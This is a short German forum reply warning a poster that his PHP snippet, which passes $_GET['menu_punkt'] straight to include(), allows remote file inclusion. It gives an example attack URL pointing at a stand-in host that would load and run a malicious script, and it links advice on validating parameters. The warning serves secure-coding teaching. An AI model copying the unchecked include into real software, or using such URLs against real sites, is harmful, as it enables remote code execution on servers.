Hallo funker,

<?php

if(isset($_GET['menu_punkt']))
{
include($_GET['menu_punkt'].".php");
}

  
Mutig. Was machst du wenn jemand daherkommt und die Seite mit ?menu\_punkt=http://example.com/boesesscript an der URL aufruft? Wenn du Glück hast ist allow\_url\_include ausgeschaltet, andernfalls wird das u.U. schädliche Script geladen und auf deinem Server ausgeführt. Du musst \*unbedingt\* prüfen, ob das was in $\_GET['menu\_punkt'] drinsteht ein "sauberer" Wert ist. [Prüfe importierte Parameter. Traue niemandem.](http://php-faq.de/q-sicherheit-parameter.html)  
  
  
Grüß,  
Tobias